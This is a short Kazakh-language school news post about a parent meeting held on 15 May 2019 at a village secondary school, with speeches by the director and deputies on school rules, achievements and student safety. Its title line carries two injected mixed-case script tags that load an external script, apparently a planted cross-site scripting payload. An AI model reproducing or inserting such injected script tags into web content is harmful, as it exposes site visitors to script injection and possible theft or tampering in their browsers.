Ата-аналар жиналысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.05.2019

15.05.2019 күні халықаралық отбасы күніне орай Ы.Алтынсарин ауылының орта мектебінде ата-аналар жиналысы болып өтті. 
Жиналысты ұйымдастырудағы мақсатымыз мектеп пен ата-аналар арасындағы байланысты күшейту арқылы, баланың оқу -тəрбиесін нығайту. 
Күн тəртібі бойынша ең алдымен мектеп директоры Т.А.Шахарбаев ата-аналарды мерекемен құттықтап, мектеп ережелері, оқушы жəне ата-ана құқықтары жөнінде сөз сөйледі. Директордың оқу ісі жөніндегі орынбасары Қ.Ихласовна 2018-1019оқу жылында оқушыларымыздың көрсеткен жетістіктері жөнінде сөз сөйледі. Оқушыларда қауіпсіздікті сақтау жəне құқық бұзушылықтың алдын алу жөнінде директордың тəрбие ісі жөніндегі орынбасары Ж.А.Сулейманова сөз сөйледі. 2018-2019оқу жылында ата-аналармен жəне оқушылармен жүргізілген тəрбие жұмыстары жөнінде баяндама жасалды. Ата-аналар тарапынан қойылған сұрақтарға қанағаттанарлықтай жауап берілді.

 
Просмотров: 762


Пікір қосу



Деректерді қолтаңбаға қосу